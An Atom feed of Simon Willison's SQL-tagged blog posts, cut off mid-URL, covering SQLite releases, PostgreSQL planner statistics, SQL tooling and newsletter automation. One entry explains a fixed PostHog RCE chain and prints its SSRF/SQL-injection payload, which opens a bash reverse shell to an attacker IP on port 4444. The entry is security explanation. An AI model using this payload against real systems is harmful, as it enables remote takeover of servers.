<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: sql</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/sql.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-11T19:56:53+00:00</updated><author><name>Simon Willison</name></author><entry><title>SQLite 3.53.0</title><link href="https://simonwillison.net/2026/Apr/11/sqlite/#atom-tag" rel="alternate"/><published>2026-04-11T19:56:53+00:00</published><updated>2026-04-11T19:56:53+00:00</updated><id>https://simonwillison.net/2026/Apr/11/sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sqlite.org/releaselog/3_53_0.html"&gt;SQLite 3.53.0&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
SQLite 3.52.0 was withdrawn so this is a pretty big release with a whole lot of accumulated user-facing and internal improvements. Some that stood out to me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ALTER TABLE&lt;/code&gt; can now add and remove &lt;code&gt;NOT NULL&lt;/code&gt; and &lt;code&gt;CHECK&lt;/code&gt; constraints - I've previously used my own &lt;a href="https://sqlite-utils.datasette.io/en/stable/python-api.html#changing-not-null-status"&gt;sqlite-utils transform() method&lt;/a&gt; for this.&lt;/li&gt;
&lt;li&gt;New &lt;a href="https://sqlite.org/json1.html#jarrayins"&gt;json_array_insert() function&lt;/a&gt; and its &lt;code&gt;jsonb&lt;/code&gt; equivalent.&lt;/li&gt;
&lt;li&gt;Significant improvements to &lt;a href="https://sqlite.org/climode.html"&gt;CLI mode&lt;/a&gt;, including result formatting.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The result formatting improvements come from a new library, the &lt;a href="https://sqlite.org/src/file/ext/qrf"&gt;Query Results Formatter&lt;/a&gt;. I &lt;a href="https://github.com/simonw/tools/pull/266"&gt;had Claude Code&lt;/a&gt; (on my phone) compile that to WebAssembly and build &lt;a href="https://tools.simonwillison.net/sqlite-qrf"&gt;this playground interface&lt;/a&gt; for trying that out.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/sqsb24/sqlite_3_53_0"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="sqlite"/></entry><entry><title>Syntaqlite Playground</title><link href="https://simonwillison.net/2026/Apr/5/syntaqlite/#atom-tag" rel="alternate"/><published>2026-04-05T19:32:59+00:00</published><updated>2026-04-05T19:32:59+00:00</updated><id>https://simonwillison.net/2026/Apr/5/syntaqlite/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;strong&gt;Tool:&lt;/strong&gt; &lt;a href="https://tools.simonwillison.net/syntaqlite"&gt;Syntaqlite Playground&lt;/a&gt;&lt;/p&gt;
    &lt;p&gt;Lalit Maganti's &lt;a href="https://github.com/LalitMaganti/syntaqlite"&gt;syntaqlite&lt;/a&gt; is currently being discussed &lt;a href="https://news.ycombinator.com/item?id=47648828"&gt;on Hacker News&lt;/a&gt; thanks to &lt;a href="https://lalitm.com/post/building-syntaqlite-ai/"&gt;Eight years of wanting, three months of building with AI&lt;/a&gt;, a deep dive into how it was built.&lt;/p&gt;
&lt;p&gt;This inspired me to revisit &lt;a href="https://github.com/simonw/research/tree/main/syntaqlite-python-extension#readme"&gt;a research project&lt;/a&gt; I ran when Lalit first released it a couple of weeks ago, where I tried it out and then compiled it to a WebAssembly wheel so it could run in Pyodide in a browser (the library itself uses C and Rust).&lt;/p&gt;
&lt;p&gt;This &lt;a href="https://tools.simonwillison.net/syntaqlite"&gt;new playground&lt;/a&gt; loads up the Python library and provides a UI for trying out its different features: formating, parsing into an AST, validating, and tokenizing SQLite SQL queries.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/syntaqlite-playground.jpg" alt="Screenshot of a dark-themed SQL validation playground called SyntaqLite. The &amp;quot;Validate&amp;quot; tab is selected from options including Format, Parse, Validate, and Tokenize. The SQL input contains &amp;quot;SELECT id, name FROM usr WHERE active = 1&amp;quot; with a schema defining &amp;quot;users&amp;quot; and &amp;quot;posts&amp;quot; tables. Example buttons for &amp;quot;Table typo&amp;quot;, &amp;quot;Column typo&amp;quot;, and &amp;quot;Valid query&amp;quot; are shown above a red &amp;quot;Validate SQL&amp;quot; button. The Diagnostics panel shows an error for unknown table 'usr' with the suggestion &amp;quot;did you mean 'users'?&amp;quot;, and the JSON panel displays the corresponding error object with severity, message, and offset fields."&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: not sure how I missed this but &lt;a href="https://playground.syntaqlite.com/#p=sqlite-basic-select"&gt;syntaqlite has its own WebAssembly playground&lt;/a&gt; linked to from the README.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="sql"/><category term="sqlite"/><category term="tools"/><category term="ai-assisted-programming"/><category term="agentic-engineering"/></entry><entry><title>Production query plans without production data</title><link href="https://simonwillison.net/2026/Mar/9/production-query-plans-without-production-data/#atom-tag" rel="alternate"/><published>2026-03-09T15:05:15+00:00</published><updated>2026-03-09T15:05:15+00:00</updated><id>https://simonwillison.net/2026/Mar/9/production-query-plans-without-production-data/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://boringsql.com/posts/portable-stats/"&gt;Production query plans without production data&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Radim Marek describes the new &lt;a href="https://www.postgresql.org/docs/current/functions-admin.html#FUNCTIONS-ADMIN-STATSMOD"&gt;&lt;code&gt;pg_restore_relation_stats()&lt;/code&gt; and &lt;code&gt;pg_restore_attribute_stats()&lt;/code&gt; functions&lt;/a&gt; that were introduced &lt;a href="https://www.postgresql.org/docs/current/release-18.html"&gt;in PostgreSQL 18&lt;/a&gt; in September 2025.&lt;/p&gt;
&lt;p&gt;The PostgreSQL query planner makes use of internal statistics to help it decide how to best execute a query. These statistics often differ between production data and development environments, which means the query plans used in production may not be replicable in development.&lt;/p&gt;
&lt;p&gt;PostgreSQL's new features now let you copy those statistics down to your development environment, allowing you to simulate the plans for production workloads without needing to copy in all of that data first.&lt;/p&gt;
&lt;p&gt;I found this illustrative example useful:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT pg_restore_attribute_stats(
    'schemaname', 'public',
    'relname', 'test_orders',
    'attname', 'status',
    'inherited', false::boolean,
    'null_frac', 0.0::real,
    'avg_width', 9::integer,
    'n_distinct', 5::real,
    'most_common_vals', '{delivered,shipped,cancelled,pending,returned}'::text,
    'most_common_freqs', '{0.95,0.015,0.015,0.015,0.005}'::real[]
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This simulates statistics for a &lt;code&gt;status&lt;/code&gt; column that is 95% &lt;code&gt;delivered&lt;/code&gt;. Based on these statistics PostgreSQL can decide to use an index for &lt;code&gt;status = 'shipped'&lt;/code&gt; but to instead perform a full table scan for &lt;code&gt;status = 'delivered'&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;These statistics are pretty small. Radim says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Statistics dumps are tiny. A database with hundreds of tables and thousands of columns produces a statistics dump under 1MB. The production data might be hundreds of GB. The statistics that describe it fit in a text file.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I posted on the SQLite user forum asking if SQLite could offer a similar feature and D. Richard Hipp promptly replied &lt;a href="https://sqlite.org/forum/forumpost/480c5cb8a3898346"&gt;that it has one already&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;All of the data statistics used by the query planner in SQLite are available in the &lt;a href="https://sqlite.org/fileformat.html#the_sqlite_stat1_table"&gt;sqlite_stat1 table&lt;/a&gt; (or also in the &lt;a href="https://sqlite.org/fileformat.html#the_sqlite_stat4_table"&gt;sqlite_stat4 table&lt;/a&gt; if you happen to have compiled with SQLITE_ENABLE_STAT4).  That table is writable. You can inject whatever alternative statistics you like.&lt;/p&gt;
&lt;p&gt;This approach to controlling the query planner is mentioned in the documentation:
&lt;a href="https://sqlite.org/optoverview.html#manual_control_of_query_plans_using_sqlite_stat_tables"&gt;https://sqlite.org/optoverview.html#manual_control_of_query_plans_using_sqlite_stat_tables&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;See also &lt;a href="https://sqlite.org/lang_analyze.html#fixed_results_of_analyze"&gt;https://sqlite.org/lang_analyze.html#fixed_results_of_analyze&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The ".fullschema" command in the CLI outputs both the schema and the content of the sqlite_statN tables, exactly for the reasons outlined above - so that we can reproduce query problems for testing without have to load multi-terabyte database files.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/o8vbb7/production_query_plans_without"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/d-richard-hipp"&gt;d-richard-hipp&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="postgresql"/><category term="sql"/><category term="sqlite"/><category term="d-richard-hipp"/></entry><entry><title>The most popular blogs of Hacker News in 2025</title><link href="https://simonwillison.net/2026/Jan/2/most-popular-blogs-of-hacker-news/#atom-tag" rel="alternate"/><published>2026-01-02T19:10:43+00:00</published><updated>2026-01-02T19:10:43+00:00</updated><id>https://simonwillison.net/2026/Jan/2/most-popular-blogs-of-hacker-news/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://refactoringenglish.com/blog/2025-hn-top-5/"&gt;The most popular blogs of Hacker News in 2025&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Michael Lynch maintains &lt;a href="https://refactoringenglish.com/tools/hn-popularity/"&gt;HN Popularity Contest&lt;/a&gt;, a site that tracks personal blogs on Hacker News and scores them based on how well they perform on that platform.&lt;/p&gt;
&lt;p&gt;The engine behind the project is the &lt;a href="https://github.com/mtlynch/hn-popularity-contest-data/blob/master/data/domains-meta.csv"&gt;domain-meta.csv&lt;/a&gt; CSV on GiHub, a hand-curated list of known personal blogs with author and bio and tag metadata, which Michael uses to separate out personal blog posts from other types of content.&lt;/p&gt;
&lt;p&gt;I came top of the rankings in 2023, 2024 and 2025 but I'm listed &lt;a href="https://refactoringenglish.com/tools/hn-popularity/"&gt;in third place&lt;/a&gt; for all time behind Paul Graham and Brian Krebs.&lt;/p&gt;
&lt;p&gt;I dug around in the browser inspector and was delighted to find that the data powering the site is served with open CORS headers, which means you can easily explore it with external services like Datasette Lite.&lt;/p&gt;
&lt;p&gt;Here's a convoluted window function query Claude Opus 4.5 &lt;a href="https://claude.ai/share/8e1cb294-0ff0-4d5b-b83f-58e4c7fdb0d2"&gt;wrote for me&lt;/a&gt; which, for a given domain, shows where that domain ranked for each year since it first appeared in the dataset:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-s"&gt;with yearly_scores as (&lt;/span&gt;
&lt;span class="pl-s"&gt;  select &lt;/span&gt;
&lt;span class="pl-s"&gt;    domain,&lt;/span&gt;
&lt;span class="pl-s"&gt;    strftime('%Y', date) as year,&lt;/span&gt;
&lt;span class="pl-s"&gt;    sum(score) as total_score,&lt;/span&gt;
&lt;span class="pl-s"&gt;    count(distinct date) as days_mentioned&lt;/span&gt;
&lt;span class="pl-s"&gt;  from "hn-data"&lt;/span&gt;
&lt;span class="pl-s"&gt;  group by domain, strftime('%Y', date)&lt;/span&gt;
&lt;span class="pl-s"&gt;),&lt;/span&gt;
&lt;span class="pl-s"&gt;ranked as (&lt;/span&gt;
&lt;span class="pl-s"&gt;  select &lt;/span&gt;
&lt;span class="pl-s"&gt;    domain,&lt;/span&gt;
&lt;span class="pl-s"&gt;    year,&lt;/span&gt;
&lt;span class="pl-s"&gt;    total_score,&lt;/span&gt;
&lt;span class="pl-s"&gt;    days_mentioned,&lt;/span&gt;
&lt;span class="pl-s"&gt;    rank() over (partition by year order by total_score desc) as rank&lt;/span&gt;
&lt;span class="pl-s"&gt;  from yearly_scores&lt;/span&gt;
&lt;span class="pl-s"&gt;)&lt;/span&gt;
&lt;span class="pl-s"&gt;select &lt;/span&gt;
&lt;span class="pl-s"&gt;  r.year,&lt;/span&gt;
&lt;span class="pl-s"&gt;  r.total_score,&lt;/span&gt;
&lt;span class="pl-s"&gt;  r.rank,&lt;/span&gt;
&lt;span class="pl-s"&gt;  r.days_mentioned&lt;/span&gt;
&lt;span class="pl-s"&gt;from ranked r&lt;/span&gt;
&lt;span class="pl-s"&gt;where r.domain = :domain&lt;/span&gt;
&lt;span class="pl-s"&gt;  and r.year &amp;gt;= (&lt;/span&gt;
&lt;span class="pl-s"&gt;    select min(strftime('%Y', date)) &lt;/span&gt;
&lt;span class="pl-s"&gt;    from "hn-data"&lt;/span&gt;
&lt;span class="pl-s"&gt;    where domain = :domain&lt;/span&gt;
&lt;span class="pl-s"&gt;  )&lt;/span&gt;
&lt;span class="pl-s"&gt;order by r.year desc&lt;/span&gt;&lt;/pre&gt;

&lt;p&gt;(I just noticed that the last &lt;code&gt;and r.year &amp;gt;= (&lt;/code&gt; clause isn't actually needed here.)&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://lite.datasette.io/?csv=https://hn-popularity.cdn.refactoringenglish.com/hn-data.csv#/data?sql=with+yearly_scores+as+%28%0A++select+%0A++++domain%2C%0A++++strftime%28%27%25Y%27%2C+date%29+as+year%2C%0A++++sum%28score%29+as+total_score%2C%0A++++count%28distinct+date%29+as+days_mentioned%0A++from+%22hn-data%22%0A++group+by+domain%2C+strftime%28%27%25Y%27%2C+date%29%0A%29%2C%0Aranked+as+%28%0A++select+%0A++++domain%2C%0A++++year%2C%0A++++total_score%2C%0A++++days_mentioned%2C%0A++++rank%28%29+over+%28partition+by+year+order+by+total_score+desc%29+as+rank%0A++from+yearly_scores%0A%29%0Aselect+%0A++r.year%2C%0A++r.total_score%2C%0A++r.rank%2C%0A++r.days_mentioned%0Afrom+ranked+r%0Awhere+r.domain+%3D+%3Adomain%0A++and+r.year+%3E%3D+%28%0A++++select+min%28strftime%28%27%25Y%27%2C+date%29%29+%0A++++from+%22hn-data%22%0A++++where+domain+%3D+%3Adomain%0A++%29%0Aorder+by+r.year+desc&amp;amp;domain=simonwillison.net"&gt;simonwillison.net results&lt;/a&gt; show me ranked 3rd in 2022, 30th in 2021 and 85th back in 2007 - though I expect there are many personal blogs from that year which haven't yet been manually added to Michael's list.&lt;/p&gt;
&lt;p&gt;Also useful is that every domain gets its own CORS-enabled CSV file with details of the actual Hacker News submitted from that domain, e.g. &lt;code&gt;https://hn-popularity.cdn.refactoringenglish.com/domains/simonwillison.net.csv&lt;/code&gt;. Here's &lt;a href="https://lite.datasette.io/?csv=https://hn-popularity.cdn.refactoringenglish.com/domains/simonwillison.net.csv#/data/simonwillison"&gt;that one in Datasette Lite&lt;/a&gt;.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=46465819"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/hacker-news"&gt;hacker-news&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-lite"&gt;datasette-lite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cors"&gt;cors&lt;/a&gt;&lt;/p&gt;



</summary><category term="hacker-news"/><category term="sql"/><category term="sqlite"/><category term="datasette"/><category term="datasette-lite"/><category term="cors"/></entry><entry><title>Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain</title><link href="https://simonwillison.net/2025/Dec/18/ssrf-clickhouse-postgresql/#atom-tag" rel="alternate"/><published>2025-12-18T01:42:22+00:00</published><updated>2025-12-18T01:42:22+00:00</updated><id>https://simonwillison.net/2025/Dec/18/ssrf-clickhouse-postgresql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://mdisec.com/inside-posthog-how-ssrf-a-clickhouse-sql-escaping-0day-and-default-postgresql-credentials-formed-an-rce-chain-zdi-25-099-zdi-25-097-zdi-25-096/"&gt;Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.&lt;/p&gt;
&lt;p&gt;The way in abuses a webhooks system with non-robust URL validation, setting up a SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.&lt;/p&gt;
&lt;p&gt;Here's the URL that gets injected:&lt;/p&gt;
&lt;p&gt;&lt;code style="word-break: break-all"&gt;http://clickhouse:8123/?query=SELECT+&lt;em&gt;+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+&amp;gt;%26+/dev/tcp/172.31.221.180/4444+0&amp;gt;%261\\"$$;SELECT+&lt;/em&gt;+FROM+cmd_exec;+--\",'posthog','posthog')#&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Reformatted a little for readability:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i &amp;gt;&amp;amp; /dev/tcp/172.31.221.180/4444 0&amp;gt;&amp;amp;1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This abuses ClickHouse's ability to &lt;a href="https://clickhouse.com/docs/sql-reference/table-functions/postgresql#implementation-details"&gt;run its own queries against PostgreSQL&lt;/a&gt; using the &lt;code&gt;postgresql()&lt;/code&gt; table function, combined with an escaping bug in ClickHouse PostgreSQL function (&lt;a href="https://github.com/ClickHouse/ClickHouse/pull/74144"&gt;since fixed&lt;/a&gt;). Then &lt;em&gt;that&lt;/em&gt; query abuses PostgreSQL's ability to run shell commands via &lt;code&gt;COPY ... FROM PROGRAM&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;bash -c&lt;/code&gt; bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=46305321"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webhooks"&gt;webhooks&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="postgresql"/><category term="security"/><category term="sql"/><category term="sql-injection"/><category term="webhooks"/><category term="clickhouse"/></entry><entry><title>How I automate my Substack newsletter with content from my blog</title><link href="https://simonwillison.net/2025/Nov/19/how-i-automate-my-substack-newsletter/#atom-tag" rel="alternate"/><published>2025-11-19T22:00:34+00:00</published><updated>2025-11-19T22:00:34+00:00</updated><id>https://simonwillison.net/2025/Nov/19/how-i-automate-my-substack-newsletter/#atom-tag</id><summary type="html">
    &lt;p&gt;I sent out &lt;a href="https://simonw.substack.com/p/trying-out-gemini-3-pro-with-audio"&gt;my weekly-ish Substack newsletter&lt;/a&gt; this morning and took the opportunity to record &lt;a href="https://www.youtube.com/watch?v=BoPZltKDM-s"&gt;a YouTube video&lt;/a&gt; demonstrating my process and describing the different components that make it work. There's a &lt;em&gt;lot&lt;/em&gt; of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack.&lt;/p&gt;

&lt;p&gt;&lt;lite-youtube videoid="BoPZltKDM-s" js-api="js-api"
  title="How I automate my Substack newsletter with content from my blog"
  playlabel="Play: How I automate my Substack newsletter with content from my blog"
&gt; &lt;/lite-youtube&gt;&lt;/p&gt;

&lt;p&gt;The core process is the same as I described &lt;a href="https://simonwillison.net/2023/Apr/4/substack-observable/"&gt;back in 2023&lt;/a&gt;. I have an Observable notebook called &lt;a href="https://observablehq.com/@simonw/blog-to-newsletter"&gt;blog-to-newsletter&lt;/a&gt; which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/copy-to-newsletter.jpg" alt="Screenshot of the interface. An item in a list says 9080: Trying out Gemini 3 Pro with audio transcription and a new pelican benchmark. A huge button reads Copy rich text newsletter to clipboard - below is a smaller button that says Copy just the links/quotes/TILs. A Last X days slider is set to 2. There are checkboxes for SKip content sent in prior newsletters and only include post content prior to the cutoff comment." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes.&lt;/p&gt;
&lt;p&gt;I make very minor edits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post.&lt;/li&gt;
&lt;li&gt;Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example.&lt;/li&gt;
&lt;li&gt;Blocks of preformatted text often have an extra blank line at the end, which I remove.&lt;/li&gt;
&lt;li&gt;Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more.&lt;/li&gt;
&lt;li&gt;I pick the featured image for the newsletter and add some tags.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That's the whole process!&lt;/p&gt;
&lt;h4 id="the-observable-notebook"&gt;The Observable notebook&lt;/h4&gt;
&lt;p&gt;The most important cell in the Observable notebook is this one:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-s1"&gt;raw_content&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
  &lt;span class="pl-c1"&gt;return&lt;/span&gt; &lt;span class="pl-s1"&gt;await&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;
    &lt;span class="pl-k"&gt;await&lt;/span&gt; &lt;span class="pl-en"&gt;fetch&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;
      &lt;span class="pl-s"&gt;`https://datasette.simonwillison.net/simonwillisonblog.json?sql=&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-en"&gt;encodeURIComponent&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-s1"&gt;        &lt;span class="pl-s1"&gt;sql&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-s1"&gt;      &lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;&amp;amp;_shape=array&amp;amp;numdays=&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-s1"&gt;numDays&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;`&lt;/span&gt;
    &lt;span class="pl-kos"&gt;)&lt;/span&gt;
  &lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;json&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This uses the JavaScript &lt;code&gt;fetch()&lt;/code&gt; function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook.&lt;/p&gt;
&lt;p&gt;Here's a link to &lt;a href="https://datasette.simonwillison.net/simonwillisonblog?sql=with+content+as+%28%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27entry%27+as+type%2C%0D%0A++++title%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27%3Ch3%3E%3Ca+href%3D%22%27+%7C%7C+%27https%3A%2F%2Fsimonwillison.net%2F%27+%7C%7C+strftime%28%27%25Y%2F%27%2C+created%29%0D%0A++++++%7C%7C+substr%28%27JanFebMarAprMayJunJulAugSepOctNovDec%27%2C+%28strftime%28%27%25m%27%2C+created%29+-+1%29+*+3+%2B+1%2C+3%29+%0D%0A++++++%7C%7C+%27%2F%27+%7C%7C+cast%28strftime%28%27%25d%27%2C+created%29+as+integer%29+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%2F%27+%7C%7C+%27%22%3E%27+%0D%0A++++++%7C%7C+title+%7C%7C+%27%3C%2Fa%3E+-+%27+%7C%7C+date%28created%29+%7C%7C+%27%3C%2Fh3%3E%27+%7C%7C+body%0D%0A++++++as+html%2C%0D%0A++++%27null%27+as+json%2C%0D%0A++++%27%27+as+external_url%0D%0A++from+blog_entry%0D%0A++union+all%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27blogmark%27+as+type%2C%0D%0A++++link_title%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27%3Cp%3E%3Cstrong%3ELink%3C%2Fstrong%3E+%27+%7C%7C+date%28created%29+%7C%7C+%27+%3Ca+href%3D%22%27%7C%7C+link_url+%7C%7C+%27%22%3E%27%0D%0A++++++%7C%7C+link_title+%7C%7C+%27%3C%2Fa%3E%3A%3C%2Fp%3E%3Cp%3E%27+%7C%7C+%27+%27+%7C%7C+replace%28commentary%2C+%27%0D%0A%27%2C+%27%3Cbr%3E%27%29+%7C%7C+%27%3C%2Fp%3E%27%0D%0A++++++as+html%2C%0D%0A++++json_object%28%0D%0A++++++%27created%27%2C+date%28created%29%2C%0D%0A++++++%27link_url%27%2C+link_url%2C%0D%0A++++++%27link_title%27%2C+link_title%2C%0D%0A++++++%27commentary%27%2C+commentary%2C%0D%0A++++++%27use_markdown%27%2C+use_markdown%0D%0A++++%29+as+json%2C%0D%0A++link_url+as+external_url%0D%0A++from+blog_blogmark%0D%0A++union+all%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27quotation%27+as+type%2C%0D%0A++++source%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27%3Cstrong%3Equote%3C%2Fstrong%3E+%27+%7C%7C+date%28created%29+%7C%7C%0D%0A++++%27%3Cblockquote%3E%3Cp%3E%3Cem%3E%27+%7C%7C%0D%0A++++replace%28quotation%2C+%27%0D%0A%27%2C+%27%3Cbr%3E%27%29+%7C%7C+%0D%0A++++%27%3C%2Fem%3E%3C%2Fp%3E%3C%2Fblockquote%3E%3Cp%3E%3Ca+href%3D%22%27+%7C%7C%0D%0A++++coalesce%28source_url%2C+%27%23%27%29+%7C%7C+%27%22%3E%27+%7C%7C+source+%7C%7C+%27%3C%2Fa%3E%27+%7C%7C%0D%0A++++case+%0D%0A++++++++when+nullif%28trim%28context%29%2C+%27%27%29+is+not+null+%0D%0A++++++++then+%27%2C+%27+%7C%7C+context+%0D%0A++++++++else+%27%27+%0D%0A++++end+%7C%7C%0D%0A++++%27%3C%2Fp%3E%27+a